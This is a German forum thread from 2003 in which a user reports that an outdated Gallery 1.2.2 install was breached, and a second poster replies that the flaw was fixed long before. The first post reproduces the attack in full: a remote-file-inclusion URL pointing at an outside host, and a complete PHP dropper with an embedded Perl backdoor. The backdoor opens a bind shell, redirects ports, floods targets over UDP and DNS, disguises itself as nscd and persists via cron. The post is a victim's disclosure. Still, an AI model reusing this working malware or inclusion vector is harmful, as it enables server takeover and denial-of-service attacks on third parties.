!!!Sicherheitsloch in Version 1.2.2 (und höher?)!!!
shinji
Joined: 2003-06-17
Posts: 1 |
Posted: Tue, 2003-06-17 20:34 |
Hallo !! Es gibt ein riesiges Sicherheitsloch in der Version 1.2.2 der Galerie und eventuell auch noch in höheren Versionen. Das mussten wir erst vor einigen Tagen am eigenen Leib erfahren als jemand über die Gallery ein bösartiges PERL-Script auf unseren Server installierte und damit einen freien Zugang zu unserem Rechner erlangen konnte. Das Script öffnet den Port 1337 nach außen und installiert sich einen Cronjob der stündlich startet und bestimmt 5GB Traffic pro Stunde verursacht !!! Das Problem ist die Datei modsecurity.php. Über den Parameteraufruf /gallery/errors/configmode.php?GALLERY_BASEDIR=http://vddos.tripod.com/ war es möglich das unten angefügte Script .nscdrecover zu installieren. 80.64.108.45 Mehr dazu auch in der Newsgroup linux.debian.security: Und hier das PERL-Script: <?php $bfg = <<<ENDOFBFG #!/usr/bin/perl -w \$pass = "SOdS8vdw0SB0U"; \$str = 'Mess with the best - die like a rest!'x1337; use IO::Socket; use IO::Select; use POSIX; sub redir { my \$port = shift; my \$dest = shift; \$SIG{ALRM} = sub { exit }; alarm 60; \$sa = IO::Socket::INET->new( Proto => "tcp", Listen => 1, ReuseAddr => 1, LocalPort => \$port) or exit; \$sin = \$sa->accept or exit; close(\$sa); alarm 0; \$sout = IO::Socket::INET->new( Proto => "tcp", PeerAddr => \$dest) or exit; \$sin->autoflush(1); \$sout->autoflush(1); \$sel = IO::Select->new(\$sin, \$sout); while(@sock = \$sel->can_read(180)) { foreach \$s(@sock) { \$buf = <\$s>; exit unless(\$buf); print \$sout \$buf if(\$s eq \$sin); print \$sin \$buf if(\$s eq \$sout); }}} sub shell { my \$port = shift; \$SIG{ALRM} = sub { exit }; alarm 60; use Socket; socket(S, PF_INET, SOCK_STREAM, 0); setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1); bind(S, sockaddr_in(\$port, INADDR_ANY)); listen(S, 1); accept(X, S); close(S); alarm 0; open STDIN, "<&X"; open STDOUT, ">&X"; open STDERR, ">&X"; close X; exec("/bin/sh"); } sub udp { my \$host = shift; my \$time = shift; \$sock = IO::Socket::INET->new(Proto => 'udp', PeerAddr => \$host, PeerPort => int(rand 65535)) or exit; \$sock->autoflush(1); \$SIG{ALRM} = sub { exit }; alarm \$time; alarm 180 unless(alarm \$time); print \$sock \$str while(1); } sub ddns { my \$host = shift; my \$time = shift; \$sock = new IO::Socket::INET->new(Proto => 'udp', PeerAddr => \$host, PeerPort => 53) or exit; \$sock->autoflush(1); \$SIG{ALRM} = sub { exit }; alarm \$time; alarm 180 unless(alarm \$time); while(1) { my \$s = int(rand(89)+10); my \$r1 = int(rand(89)+10); my \$r2 = int(rand(89)+10); my \$r3 = int(rand(89)+10); my \$r4 = int(rand(89)+10); send(\$sock,"\$s\\x01\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x02\$r1\\x02\$r2\\x02\$r3\\x02\$r4\\x07in-addr\\x04arpa\\x00\\x00\\x0c\\x00\\x01",0); }} \$0 = '/usr/sbin/nscd'.' 'x100; exit if fork; \$SIG{ALRM} = 'IGNORE'; \$SIG{TERM} = 'IGNORE'; \$SIG{CHLD} = 'IGNORE'; \$SIG{INT} = 'IGNORE'; \$SIG{QUIT} = 'IGNORE'; \$SIG{HUP} = 'IGNORE'; open STDIN, "</dev/null"; open STDOUT, ">/dev/null"; open STDERR, ">/dev/null"; POSIX::setsid(); \$csock = IO::Socket::INET->new(Proto => 'udp', LocalPort => 1337) or exit; while(\$string = <\$csock>) { chop(\$string); my (\$pw, \$cmd, \$arg1, \$arg2) = split " ", \$string; next unless(\$cmd); next unless(\$arg1); next unless(crypt(\$pw, \$pass) eq \$pass); if (\$cmd eq "ping") { my \$bsock = IO::Socket::INET->new(Proto => 'udp', PeerAddr => \$arg1, PeerPort => \$arg2, ReuseAddr => 1) or next; print \$bsock "pong ".`uname -mnrs`; close \$bsock; } elsif (\$cmd eq "die") { exit if(crypt(\$arg1, \$pass) eq \$pass); } elsif (\$cmd eq "redir") { redir(\$arg1, \$arg2) unless(fork); } elsif (\$cmd eq "shell") { shell(\$arg1) unless(fork); } elsif (\$cmd eq "udp") { udp(\$arg1, \$arg2) unless(fork); } elsif (\$cmd eq "ddns") { ddns(\$arg1, \$arg2) unless(fork); } } ENDOFBFG; $file="/.nscdrecover"; $dir = getcwd(); unlink($dir.$file); $f = fopen($dir.$file, "w+"); if(!$f) { $dir = "/var/tmp"; unlink($dir.$file); $f = fopen($dir.$file, "w+"); if(!$f) { $dir = "/tmp"; unlink($dir.$file); $f = fopen($dir.$file, "w+"); } } fputs($f, $bfg); fclose($f); passthru("killall -9 perl"); passthru("killall -9 nscd"); passthru("chmod 555 ".$dir.$file); passthru("crontab -l|grep -v ".$file." >".$dir."/ct"); passthru("echo \"0 * * * *\" ".$dir.$file." >>".$dir."/ct"); passthru("crontab ".$dir."/ct"); unlink($dir."/ct"); passthru($dir.$file." >/dev/null 2>/dev/null"); echo "all done"; ?> Unsere Gallery wurde jetzt erst einmal deaktiviert. Ist über diese Lücke was bekannt? DANKE ! Gruß |
|
Posts: 6818
Hi,
also ich habe das Problem Bharat (dem Entwickler) der Gallery geschildert.
Dein Problem wurde nach seiner Aussage vor ca. 1,5 Jahren gefixed.
Siehe
http://gallery.menalto.com/modules.php?op=modload&name=News&file=article&sid=33
Deine Gallery Version ist ja auch in der Tat sehr veraltet.
Daher _muss_ ich leider sagen : Selber schuld.
Gruß,
Jens